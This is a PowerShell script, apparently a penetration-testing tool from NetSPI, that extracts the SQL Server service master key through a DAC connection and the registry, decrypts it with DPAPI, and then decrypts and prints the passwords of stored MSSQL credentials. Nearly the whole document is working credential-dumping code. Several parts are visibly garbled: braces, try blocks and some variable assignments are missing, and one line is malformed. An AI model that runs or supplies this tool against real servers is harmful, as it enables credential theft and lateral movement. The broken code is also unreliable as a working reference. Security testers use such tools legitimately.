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PowerShell script to extract and decrypt MSSQL Credentials passwords.

function Get-MSSQLCredentialPasswords {

      Extract and decrypt MSSQL Credentials passwords.

      Author: Antti Rantasaari 2014, NetSPI
      License: BSD 3-Clause

      Get-MSSQLCredentialPasswords extracts and decrypts the connection credentials for all saved Credentials.



      Returns a datatable consisting of MSSQL instance name, credential name, user account, and decrypted password.

      C:\PS> Get-MSSQLCredentialPasswords

      Instance   Credential User  Password
      --------   ---------- ----  --------
      SQLEXPRESS test       test  test
      SQLEXPRESS user1      user1 Passw0rd01!
      SQL2012    user2      user2 Passw0rd01!
      SQL2012    VAULT      user3 !@#Sup3rS3cr3tP4$$w0rd!!$$

      For successful execution, the following configurations and privileges are needed:
      - DAC connectivity to MSSQL instances
      - Local administrator privileges (needed to access registry key)
      - Sysadmin privileges to MSSQL instances

  Add-Type -assembly System.Security
  Add-Type -assembly System.Core

  # Set local computername and get all SQL Server instances
  $ComputerName = $Env:computername
  $SqlInstances = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server' -Name InstalledInstances).InstalledInstances

  $Results = New-Object "System.Data.DataTable"
  $Results.Columns.Add("Instance") | Out-Null
  $Results.Columns.Add("Credential") | Out-Null
  $Results.Columns.Add("User") | Out-Null
  $Results.Columns.Add("Password") | Out-Null

  foreach ($InstanceName in $SqlInstances) {

    # Start DAC connection to SQL Server
    # Default instance MSSQLSERVER -> instance name cannot be used in connection string
    if ($InstanceName -eq "MSSQLSERVER") {
      $ConnString = "Server=ADMIN:$ComputerName\;Trusted_Connection=True"
    else {
      $ConnString = "Server=ADMIN:$ComputerName\$InstanceName;Trusted_Connection=True"
    $Conn = New-Object System.Data.SqlClient.SQLConnection($ConnString);

      Write-Error "Error creating DAC connection: $_.Exception.Message"
    if ($Conn.State -eq "Open"){
      # Query Service Master Key from the database - remove padding from the key
      # key_id 102 eq service master key, thumbprint 3 means encrypted with machinekey
      $SqlCmd="SELECT substring(crypt_property,9,len(crypt_property)-8) FROM sys.key_encryptions WHERE key_id=102 and (thumbprint=0x03 or thumbprint=0x0300000001)"
      $Cmd = New-Object System.Data.SqlClient.SqlCommand($SqlCmd,$Conn);

      # Get entropy from the registry - hopefully finds the right SQL server instance
      $RegPath = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\Instance Names\sql\").$InstanceName
      [byte[]]$Entropy = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\$RegPath\Security\").Entropy

      # Decrypt the service master key
      $ServiceKey = [System.Security.Cryptography.ProtectedData]::Unprotect($SmkBytes, $Entropy, 'LocalMachine')

      # Choose the encryption algorithm based on the SMK length - 3DES for 2008, AES for 2012
      # Choose IV length based on the algorithm
      if (($ServiceKey.Length -eq 16) -or ($ServiceKey.Length -eq 32)) {
        if ($ServiceKey.Length -eq 16) {
          $Decryptor = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider
        } elseif ($ServiceKey.Length -eq 32){
          $Decryptor = New-Object System.Security.Cryptography.AESCryptoServiceProvider

        # Query credential password information from the DB
        # Remove header from imageval, extract IV (as iv) and ciphertext (as pass)
        # Not sure what valclass and valnum mean, could not find documentation.. but valclass 28 with valnum 2 seems to store the encrypted password

        $SqlCmd = "SELECT name,credential_identity,substring(imageval,5,$ivlen) iv, substring(imageval,$($ivlen+5),len(imageval)-$($ivlen+4)) pass from sys.credentials cred inner join sys.sysobjvalues obj on cred.credential_id = obj.objid where valclass=28 and valnum=2"

        $Cmd = New-Object System.Data.SqlClient.SqlCommand($SqlCmd,$Conn);
        $Dt = New-Object "System.Data.DataTable"

        # Go through each row in results
        foreach ($Logins in $Dt) {

          # decrypt the password using the service master key and the extracted IV
          $Decryptor.Padding = "None"
          $Decrypt = $Decryptor.CreateDecryptor($ServiceKey,$Logins.iv)
          $Stream = New-Object System.IO.MemoryStream (,$Logins.pass)
          $Crypto = New-Object System.Security.Cryptography.CryptoStream $Stream,$Decrypt,"Write"

          [byte[]]$Decrypted = $Stream.ToArray()

          # convert decrypted password to unicode
          $EncodingType = "System.Text.UnicodeEncoding"
          $Encode = New-Object $EncodingType

          # Print results - removing the weird padding (8 bytes in the front, some bytes at the end)...
          # Might cause problems but so far seems to work.. may be dependant on SQL server version...
          # If problems arise remove the next three lines..
          foreach ($b in $Decrypted) {if ($Decrypted[$i] -ne 0 -and $Decrypted[$i+1] -ne 0 -or $i -eq $Decrypted.Length) {$i -= 1; break;}; $i += 1;}
          $Decrypted = $Decrypted[8..$i]
          $Results.Rows.Add($InstanceName,$($,$($Logins.credential_identity),$($Encode.GetString($Decrypted))) | Out-Null
      } else {
        Write-Error "Unknown key size"